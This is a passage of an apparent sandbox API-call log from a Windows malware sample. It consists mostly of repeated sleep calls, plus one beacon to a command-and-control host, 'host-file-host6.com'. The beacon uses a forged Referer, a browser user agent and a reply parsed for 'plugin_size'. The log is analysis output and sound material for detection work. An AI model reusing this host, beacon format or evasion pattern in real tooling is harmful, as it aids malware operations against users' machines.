Sleep (dwMilliseconds=0x258) [0224.294] Sleep (dwMilliseconds=0x258) [0224.309] Sleep (dwMilliseconds=0x258) [0224.360] Sleep (dwMilliseconds=0x258) [0224.386] Sleep (dwMilliseconds=0x258) [0224.408] Sleep (dwMilliseconds=0x258) [0224.453] Sleep (dwMilliseconds=0x258) [0224.476] Sleep (dwMilliseconds=0x258) [0224.481] Sleep (dwMilliseconds=0x258) [0224.500] Sleep (dwMilliseconds=0x258) [0224.546] Sleep (dwMilliseconds=0x258) [0224.564] Sleep (dwMilliseconds=0x258) [0224.574] Sleep (dwMilliseconds=0x258) [0224.609] Sleep (dwMilliseconds=0x258) [0224.653] Sleep (dwMilliseconds=0x258) [0224.674] Sleep (dwMilliseconds=0x258) [0224.684] Sleep (dwMilliseconds=0x258) [0224.719] Sleep (dwMilliseconds=0x258) [0224.765] Sleep (dwMilliseconds=0x258) [0224.782] Sleep (dwMilliseconds=0x258) [0224.796] Sleep (dwMilliseconds=0x258) [0224.830] Sleep (dwMilliseconds=0x258) [0224.875] Sleep (dwMilliseconds=0x258) [0224.905] Sleep (dwMilliseconds=0x258) [0224.923] Sleep (dwMilliseconds=0x258) [0224.970] Sleep (dwMilliseconds=0x258) [0225.124] Sleep (dwMilliseconds=0x258) [0225.143] Sleep (dwMilliseconds=0x258) [0225.156] Sleep (dwMilliseconds=0x258) [0225.204] Sleep (dwMilliseconds=0x258) [0225.250] Sleep (dwMilliseconds=0x258) [0225.297] Sleep (dwMilliseconds=0x258) [0225.342] Sleep (dwMilliseconds=0x258) [0225.407] Sleep (dwMilliseconds=0x258) [0225.443] Sleep (dwMilliseconds=0x258) [0225.453] Sleep (dwMilliseconds=0x258) [0225.514] Sleep (dwMilliseconds=0x258) [0225.584] Sleep (dwMilliseconds=0x258) [0225.645] Sleep (dwMilliseconds=0x258) [0225.719] Sleep (dwMilliseconds=0x258) [0225.739] Sleep (dwMilliseconds=0x258) [0225.750] Sleep (dwMilliseconds=0x258) [0225.781] Sleep (dwMilliseconds=0x258) [0225.829] Sleep (dwMilliseconds=0x258) [0225.864] Sleep (dwMilliseconds=0x258) [0225.872] Sleep (dwMilliseconds=0x258) [0225.890] Sleep (dwMilliseconds=0x258) [0225.939] Sleep (dwMilliseconds=0x258) [0225.981] Sleep (dwMilliseconds=0x258) [0226.049] Sleep (dwMilliseconds=0x258) [0226.131] Sleep (dwMilliseconds=0x258) [0226.153] Sleep (dwMilliseconds=0x258) [0226.309] Sleep (dwMilliseconds=0x258) [0226.359] Sleep (dwMilliseconds=0x258) [0226.374] Sleep (dwMilliseconds=0x258) [0226.422] Sleep (dwMilliseconds=0x258) [0226.455] Sleep (dwMilliseconds=0x258) [0226.468] Sleep (dwMilliseconds=0x258) [0226.483] Sleep (dwMilliseconds=0x258) [0226.532] Sleep (dwMilliseconds=0x258) [0226.550] Sleep (dwMilliseconds=0x258) [0226.559] Sleep (dwMilliseconds=0x258) [0226.590] Sleep (dwMilliseconds=0x258) [0226.640] Sleep (dwMilliseconds=0x258) [0226.702] Sleep (dwMilliseconds=0x258) [0226.735] Sleep (dwMilliseconds=0x258) [0226.746] Sleep (dwMilliseconds=0x258) [0226.766] Sleep (dwMilliseconds=0x258) [0226.809] Sleep (dwMilliseconds=0x258) [0226.842] Sleep (dwMilliseconds=0x258) [0226.856] Sleep (dwMilliseconds=0x258) [0226.907] Sleep (dwMilliseconds=0x258) [0226.925] Sleep (dwMilliseconds=0x258) [0226.937] Sleep (dwMilliseconds=0x258) [0226.965] Sleep (dwMilliseconds=0x258) [0227.016] Sleep (dwMilliseconds=0x258) [0227.074] Sleep (dwMilliseconds=0x258) [0227.156] Sleep (dwMilliseconds=0x258) [0227.171] Sleep (dwMilliseconds=0x258) [0227.219] Sleep (dwMilliseconds=0x258) [0227.250] Sleep (dwMilliseconds=0x258) [0227.263] Sleep (dwMilliseconds=0x258) [0227.278] Sleep (dwMilliseconds=0x258) [0227.326] Sleep (dwMilliseconds=0x258) [0227.374] Sleep (dwMilliseconds=0x258) [0227.500] Sleep (dwMilliseconds=0x258) [0227.546] Sleep (dwMilliseconds=0x258) [0227.594] Sleep (dwMilliseconds=0x258) [0227.656] Sleep (dwMilliseconds=0x258) [0227.691] Sleep (dwMilliseconds=0x258) [0227.699] Sleep (dwMilliseconds=0x258) [0227.719] Sleep (dwMilliseconds=0x258) [0227.765] Sleep (dwMilliseconds=0x258) [0227.787] Sleep (dwMilliseconds=0x258) [0227.793] Sleep (dwMilliseconds=0x258) [0227.814] Sleep (dwMilliseconds=0x258) [0227.858] Sleep (dwMilliseconds=0x258) [0227.875] Sleep (dwMilliseconds=0x258) [0227.903] Sleep (dwMilliseconds=0x258) [0227.953] Sleep (dwMilliseconds=0x258) [0227.987] Sleep (dwMilliseconds=0x258) [0227.999] Sleep (dwMilliseconds=0x258) [0228.014] Sleep (dwMilliseconds=0x258) [0228.063] Sleep (dwMilliseconds=0x258) [0228.088] Sleep (dwMilliseconds=0x258) [0228.124] Sleep (dwMilliseconds=0x258) [0228.141] Sleep (dwMilliseconds=0x258) [0228.187] Sleep (dwMilliseconds=0x258) [0228.208] Sleep (dwMilliseconds=0x258) [0228.217] Sleep (dwMilliseconds=0x258) [0228.250] Sleep (dwMilliseconds=0x258) [0228.297] Sleep (dwMilliseconds=0x258) [0228.359] Sleep (dwMilliseconds=0x258) [0228.390] Sleep (dwMilliseconds=0x258) [0228.407] Sleep (dwMilliseconds=0x258) [0228.421] Sleep (dwMilliseconds=0x258) [0228.471] Sleep (dwMilliseconds=0x258) [0228.503] Sleep (dwMilliseconds=0x258) [0228.515] Sleep (dwMilliseconds=0x258) [0228.530] Sleep (dwMilliseconds=0x258) [0228.578] Sleep (dwMilliseconds=0x258) [0228.597] Sleep (dwMilliseconds=0x258) [0228.606] Sleep (dwMilliseconds=0x258) [0228.639] Sleep (dwMilliseconds=0x258) [0228.688] Sleep (dwMilliseconds=0x258) [0228.746] Sleep (dwMilliseconds=0x258) [0228.785] Sleep (dwMilliseconds=0x258) [0228.796] Sleep (dwMilliseconds=0x258) [0228.815] Sleep (dwMilliseconds=0x258) [0228.859] Sleep (dwMilliseconds=0x258) [0228.929] Sleep (dwMilliseconds=0x258) [0228.943] Sleep (dwMilliseconds=0x258) [0228.950] Sleep (dwMilliseconds=0x258) [0228.984] Sleep (dwMilliseconds=0x258) [0229.034] Sleep (dwMilliseconds=0x258) [0229.071] Sleep (dwMilliseconds=0x258) [0229.075] Sleep (dwMilliseconds=0x258) [0229.126] Sleep (dwMilliseconds=0x258) [0229.172] Sleep (dwMilliseconds=0x258) [0229.195] Sleep (dwMilliseconds=0x258) [0229.201] Sleep (dwMilliseconds=0x258) [0229.216] Sleep (dwMilliseconds=0x258) [0229.265] Sleep (dwMilliseconds=0x258) [0229.284] Sleep (dwMilliseconds=0x258) [0229.294] Sleep (dwMilliseconds=0x258) [0229.327] Sleep (dwMilliseconds=0x258) [0229.513] Sleep (dwMilliseconds=0x258) [0229.606] Sleep (dwMilliseconds=0x258) [0229.708] Sleep (dwMilliseconds=0x258) [0229.747] Sleep (dwMilliseconds=0x258) [0229.858] Sleep (dwMilliseconds=0x258) [0229.917] Sleep (dwMilliseconds=0x258) [0229.936] Sleep (dwMilliseconds=0x258) [0230.001] Sleep (dwMilliseconds=0x258) [0230.029] Sleep (dwMilliseconds=0x258) [0230.054] Sleep (dwMilliseconds=0x258) [0230.124] Sleep (dwMilliseconds=0x258) [0230.203] Sleep (dwMilliseconds=0x258) [0230.249] Sleep (dwMilliseconds=0x258) [0230.295] Sleep (dwMilliseconds=0x258) [0230.309] Sleep (dwMilliseconds=0x258) [0230.359] Sleep (dwMilliseconds=0x258) [0230.397] Sleep (dwMilliseconds=0x258) [0230.403] Sleep (dwMilliseconds=0x258) [0230.421] Sleep (dwMilliseconds=0x258) [0230.468] Sleep (dwMilliseconds=0x258) [0230.481] Sleep (dwMilliseconds=0x258) [0230.503] Sleep (dwMilliseconds=0x258) [0230.531] Sleep (dwMilliseconds=0x258) [0230.580] Sleep (dwMilliseconds=0x258) [0230.637] Sleep (dwMilliseconds=0x258) [0230.704] Sleep (dwMilliseconds=0x258) [0230.740] Sleep (dwMilliseconds=0x258) [0230.750] Sleep (dwMilliseconds=0x258) [0230.762] Sleep (dwMilliseconds=0x258) [0230.813] Sleep (dwMilliseconds=0x258) [0230.833] Sleep (dwMilliseconds=0x258) [0230.841] Sleep (dwMilliseconds=0x258) [0230.860] Sleep (dwMilliseconds=0x258) [0230.906] Sleep (dwMilliseconds=0x258) [0230.931] Sleep (dwMilliseconds=0x258) [0230.934] Sleep (dwMilliseconds=0x258) [0231.059] Sleep (dwMilliseconds=0x258) [0231.122] Sleep (dwMilliseconds=0x258) [0231.232] Sleep (dwMilliseconds=0x258) [0231.283] Sleep (dwMilliseconds=0x258) [0231.343] Sleep (dwMilliseconds=0x258) [0231.379] Sleep (dwMilliseconds=0x258) [0231.392] Sleep (dwMilliseconds=0x258) [0231.406] Sleep (dwMilliseconds=0x258) [0231.450] Sleep (dwMilliseconds=0x258) [0231.480] Sleep (dwMilliseconds=0x258) [0231.497] Sleep (dwMilliseconds=0x258) [0231.544] Sleep (dwMilliseconds=0x258) [0231.567] Sleep (dwMilliseconds=0x258) [0231.611] Sleep (dwMilliseconds=0x258) [0231.656] Sleep (dwMilliseconds=0x258) [0231.718] Sleep (dwMilliseconds=0x258) [0231.786] Sleep (dwMilliseconds=0x258) [0231.816] Sleep (dwMilliseconds=0x258) [0231.824] Sleep (dwMilliseconds=0x258) [0231.842] Sleep (dwMilliseconds=0x258) [0231.898] Sleep (dwMilliseconds=0x258) [0231.916] Sleep (dwMilliseconds=0x258) [0231.918] Sleep (dwMilliseconds=0x258) [0231.951] Sleep (dwMilliseconds=0x258) [0231.991] Sleep (dwMilliseconds=0x258) [0231.998] Sleep (dwMilliseconds=0x258) [0232.043] Sleep (dwMilliseconds=0x258) [0232.078] Sleep (dwMilliseconds=0x258) [0232.091] Sleep (dwMilliseconds=0x258) [0232.125] Sleep (dwMilliseconds=0x258) [0232.247] Sleep (dwMilliseconds=0x258) [0232.275] Sleep (dwMilliseconds=0x258) [0232.277] Sleep (dwMilliseconds=0x258) [0232.294] Sleep (dwMilliseconds=0x258) [0232.344] Sleep (dwMilliseconds=0x258) [0232.358] Sleep (dwMilliseconds=0x258) [0232.371] Sleep (dwMilliseconds=0x258) [0232.438] Sleep (dwMilliseconds=0x258) [0232.519] Sleep (dwMilliseconds=0x258) [0232.592] Sleep (dwMilliseconds=0x258) [0232.706] Sleep (dwMilliseconds=0x258) [0232.830] Sleep (dwMilliseconds=0x258) [0232.937] Sleep (dwMilliseconds=0x258) [0232.999] Sleep (dwMilliseconds=0x258) [0233.078] Sleep (dwMilliseconds=0x258) [0233.146] Sleep (dwMilliseconds=0x258) [0233.156] Sleep (dwMilliseconds=0x258) [0233.169] Sleep (dwMilliseconds=0x258) [0233.251] Sleep (dwMilliseconds=0x258) [0233.284] Sleep (dwMilliseconds=0x258) [0233.404] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x24) returned 0x8001840 [0233.404] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0233.405] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x698bc154 [0233.405] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x38) returned 0x80018b0 [0233.406] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe5920b [0233.406] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x7ac4f1c4 [0233.406] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe5ebd0ae [0233.406] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x7d66bfa6 [0233.406] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xce9bf6a4 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xee464423 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa3d55980 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe9ec20a8 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x82054d5f [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf975c5fc [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x44bfedea [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xb837586d [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x350c1b68 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xbf121c8 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x85edc80d [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xde219234 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xcf8edcfb [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x485ba8a5 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x113df5d [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4fb9fa98 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xcf8ba7d6 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x73c066fe [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4a6e7587 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x20ced597 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa02a88b8 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xde8a96d1 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9df45ff6 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xd479af14 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf3f21942 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x396746d1 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x6ed79df [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xe85b8e7a [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa7715293 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xc0a03b65 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5f390914 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x1122b5bd [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x32163add [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x86dcbdfb [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xf5dc3950 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8f6828d3 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x17606362 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x5aca99d5 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xdf4c9a80 [0233.407] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4ccba0cf [0233.408] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x925c65e0 [0233.408] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8bfea99e [0233.408] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xcd7e5816 [0233.408] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x87) returned 0x80018f0 [0233.408] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0233.408] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0233.408] lstrcatA (in: lpString1="", lpString2="pub2" | out: lpString1="pub2") returned="pub2" [0233.408] lstrcatA (in: lpString1="", lpString2=",qE/EreuF5I@1S.3X^6'so^P-zUo'pn#>PO^rzA`OLw@e]c" | out: lpString1=",qE/EreuF5I@1S.3X^6'so^P-zUo'pn#>PO^rzA`OLw@e]c") returned=",qE/EreuF5I@1S.3X^6'so^P-zUo'pn#>PO^rzA`OLw@e]c" [0233.408] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10c) returned 0x8001980 [0233.408] lstrlenA (lpString="http://host-file-host6.com/") returned 27 [0233.408] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x8001840, cbMultiByte=28, lpWideCharStr=0x8001980, cchWideChar=56 | out: lpWideCharStr="http://host-file-host6.com/") returned 28 [0233.408] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xfeefc18 | out: pProxyConfig=0xfeefc18) returned 1 [0233.424] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xa32eb00 [0233.426] WinHttpCrackUrl (in: pwszUrl="http://host-file-host6.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0xfeefcd0 | out: lpUrlComponents=0xfeefcd0) returned 1 [0233.426] WinHttpConnect (hSession=0xa32eb00, pswzServerName="host-file-host6.com", nServerPort=0x50, dwReserved=0x0) returned 0xa092720 [0233.426] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x12) returned 0x8001aa0 [0233.426] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x68) returned 0x8001ac0 [0233.426] WinHttpOpenRequest (hConnect=0xa092720, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0xa31ac70 [0233.427] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x4e) returned 0x8001b30 [0233.427] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x10d) returned 0x8001b90 [0233.427] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x3720db24 [0233.428] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x12) returned 0x8001cb0 [0233.428] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x17) returned 0x8001cd0 [0233.428] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xed0c9053 [0233.428] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa7dfbf33 [0233.428] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xff0c63cd [0233.428] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x30306443 [0233.428] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x9a9e9b9e [0233.428] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xfd9d4117 [0233.428] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x74e3facc [0233.428] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x8cfe3d6a [0233.428] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x736e5656 [0233.428] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0xa8f3c224 [0233.428] RtlRandom (in: Seed=0x550e9e | out: Seed=0x550e9e) returned 0x4c6761be [0233.428] wsprintfW (in: param_1=0x8001b90, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://wlnpnhgclv.com/") returned 44 [0233.428] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001cd0) returned 0x17 [0233.428] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001cd0) returned 1 [0233.428] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001cb0) returned 0x12 [0233.428] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001cb0) returned 1 [0233.428] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001b30) returned 0x4e [0233.429] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001b30) returned 1 [0233.429] WinHttpAddRequestHeaders (hRequest=0xa31ac70, pwszHeaders="Accept: */*\r\nReferer: http://wlnpnhgclv.com/", dwHeadersLength=0xffffffff, dwModifiers=0x20000000) returned 1 [0233.429] WinHttpSendRequest (hRequest=0xa31ac70, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x0, lpOptional=0x80018f0*, dwOptionalLength=0x7e, dwTotalLength=0x7e, dwContext=0x0) returned 1 [0234.015] WinHttpReceiveResponse (hRequest=0xa31ac70, lpReserved=0x0) returned 1 [0234.015] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x2800) returned 0x8001cb0 [0234.015] WinHttpReadData (in: hRequest=0xa31ac70, lpBuffer=0x8001cb0, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfeefd88 | out: lpBuffer=0x8001cb0*, lpdwNumberOfBytesRead=0xfeefd88*=0x18) returned 1 [0234.016] RtlReAllocateHeap (Heap=0x8000000, Flags=0x8, Ptr=0x8001cb0, Size=0x5000) returned 0x8001cb0 [0234.016] WinHttpReadData (in: hRequest=0xa31ac70, lpBuffer=0x8001cc8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0xfeefd88 | out: lpBuffer=0x8001cc8*, lpdwNumberOfBytesRead=0xfeefd88*=0x0) returned 1 [0234.016] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0234.017] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001cb0) returned 1 [0234.017] WinHttpCloseHandle (hInternet=0xa31ac70) returned 1 [0234.018] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001b90) returned 0x10d [0234.018] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001b90) returned 1 [0234.018] WinHttpCloseHandle (hInternet=0xa092720) returned 1 [0234.018] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001ac0) returned 0x68 [0234.018] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001ac0) returned 1 [0234.018] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001aa0) returned 0x12 [0234.018] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001aa0) returned 1 [0234.018] WinHttpCloseHandle (hInternet=0xa32eb00) returned 1 [0234.019] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001980) returned 0x10c [0234.019] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001980) returned 1 [0234.019] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x80018b0) returned 0x38 [0234.020] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x80018b0) returned 1 [0234.020] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x80018f0) returned 0x87 [0234.020] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x80018f0) returned 1 [0234.020] lstrlenA (lpString="ä\x070|:|plugin_size=0") returned 19 [0234.020] RtlAllocateHeap (HeapHandle=0x8000000, Flags=0x8, Size=0x15) returned 0x80018b0 [0234.020] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0234.020] lstrlenA (lpString="plugin_size") returned 11 [0234.020] atoi (_Str="0") returned 0 [0234.020] lstrlenA (lpString="0|:|plugin_size=0") returned 17 [0234.020] lstrlenA (lpString="|:|") returned 3 [0234.020] MapViewOfFile (hFileMappingObject=0x2184, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x4960000 [0234.029] lstrcatA (in: lpString1="", lpString2="plugin_size=0" | out: lpString1="plugin_size=0") returned="plugin_size=0" [0234.030] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x4960000) returned 0x0 [0234.315] atoi (_Str="0") returned 0 [0234.315] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.317] RtlSizeHeap (HeapHandle=0x8000000, Flags=0x0, MemoryPointer=0x8001840) returned 0x24 [0234.317] RtlFreeHeap (HeapHandle=0x8000000, Flags=0x0, BaseAddress=0x8001840) returned 1 [0234.317] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0234.317] Sleep (dwMilliseconds=0x258) [0234.545] Sleep (dwMilliseconds=0x258) [0234.672] Sleep (dwMilliseconds=0x258) [0234.816] Sleep (dwMilliseconds=0x258) [0234.927] Sleep (dwMilliseconds=0x258) [0235.014] Sleep (dwMilliseconds=0x258) [0235.121] Sleep (dwMilliseconds=0x258) [0235.163] Sleep (dwMilliseconds=0x258) [0235.173] Sleep (dwMilliseconds=0x258) [0235.200] Sleep (dwMilliseconds=0x258) [0235.280] Sleep (dwMilliseconds=0x258) [0235.339] Sleep (dwMilliseconds=0x258) [0235.372] Sleep (dwMilliseconds=0x258) [0235.450] Sleep (dwMilliseconds=0x258) [0235.537] Sleep (dwMilliseconds=0x258) [0235.583] Sleep (dwMilliseconds=0x258) [0235.611] Sleep (dwMilliseconds=0x258) [0235.622] Sleep (dwMilliseconds=0x258) [0235.638] Sleep (dwMilliseconds=0x258) [0235.686] Sleep (dwMilliseconds=0x258) [0235.841] Sleep (dwMilliseconds=0x258) [0235.954] Sleep (dwMilliseconds=0x258) [0236.046] Sleep (dwMilliseconds=0x258) [0236.192] Sleep (dwMilliseconds=0x258) [0236.351] Sleep (dwMilliseconds=0x258) [0236.412] Sleep (dwMilliseconds=0x258) [0236.451] Sleep (dwMilliseconds=0x258) [0236.466] Sleep (dwMilliseconds=0x258) [0236.528] Sleep (dwMilliseconds=0x258) [0236.624] Sleep (dwMilliseconds=0x258) [0236.684] Sleep (dwMilliseconds=0x258) [0236.760] Sleep (dwMilliseconds=0x258) [0236.794] Sleep (dwMilliseconds=0x258) [0236.842] Sleep (dwMilliseconds=0x258) [0237.053] Sleep (dwMilliseconds=0x258) [0237.163] Sleep (dwMilliseconds=0x258) [0237.219] Sleep (dwMilliseconds=0x258) [0237.358] Sleep (dwMilliseconds=0x258) [0237.419] Sleep (dwMilliseconds=0x258) [0237.462] Sleep (dwMilliseconds=0x258) [0237.500] Sleep (dwMilliseconds=0x258) [0237.556] Sleep (dwMilliseconds=0x258) [0237.575] Sleep (dwMilliseconds=0x258) [0237.712] Sleep (dwMilliseconds=0x258) [0237.791] Sleep (dwMilliseconds=0x258) [0237.856] Sleep (dwMilliseconds=0x258) [0237.934] Sleep (dwMilliseconds=0x258) [0238.010] Sleep (dwMilliseconds=0x258) [0238.013] Sleep (dwMilliseconds=0x258) [0238.032] Sleep (dwMilliseconds=0x258) [0238.077] Sleep (dwMilliseconds=0x258) [0238.216] Sleep (dwMilliseconds=0x258) [0238.301] Sleep (dwMilliseconds=0x258) [0238.422] Sleep (dwMilliseconds=0x258) [0238.477] Sleep (dwMilliseconds=0x258) [0238.532] Sleep (dwMilliseconds=0x258) [0238.612] Sleep (dwMilliseconds=0x258) [0238.672] Sleep (dwMilliseconds=0x258) [0238.719] Sleep (dwMilliseconds=0x258) [0238.813] Sleep (dwMilliseconds=0x258) [0238.930] Sleep (dwMilliseconds=0x258) [0239.032] Sleep (dwMilliseconds=0x258) [0239.083] Sleep (dwMilliseconds=0x258) [0239.130] Sleep (dwMilliseconds=0x258) [0239.173] Sleep (dwMilliseconds=0x258) [0239.220] Sleep (dwMilliseconds=0x258) [0239.235] Sleep (dwMilliseconds=0x258) [0239.350] Sleep (dwMilliseconds=0x258) [0239.468] Sleep (dwMilliseconds=0x258) [0239.563] Sleep (dwMilliseconds=0x258) [0239.637] Sleep (dwMilliseconds=0x258) [0239.701] Sleep (dwMilliseconds=0x258) [0239.762] Sleep 